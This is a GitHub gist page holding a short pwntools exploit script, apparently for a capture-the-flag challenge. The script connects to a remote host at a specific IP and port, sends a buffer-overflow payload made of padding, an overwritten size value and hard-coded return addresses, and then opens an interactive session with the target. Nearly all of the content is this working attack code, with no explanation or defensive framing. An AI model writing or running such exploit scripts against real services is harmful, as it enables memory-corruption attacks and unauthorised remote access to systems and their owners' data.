Skip to content

Instantly share code, notes, and snippets.

@crixpwn
Created May 28, 2017 00:43
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save crixpwn/9acd0a17c0d8827c8bd475e51e4b287b to your computer and use it in GitHub Desktop.
Save crixpwn/9acd0a17c0d8827c8bd475e51e4b287b to your computer and use it in GitHub Desktop.
from pwn import *
r = remote('223.194.105.182',29001)
def main():
payload = 'A'*204
payload += p32(0x20f31)
payload += 'A'*192
payload += p32(0x80485bd)
payload += p32(0x8048980)
r.sendline(payload)
r.sendline(payload)
r.interactive()
if __name__=='__main__':
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment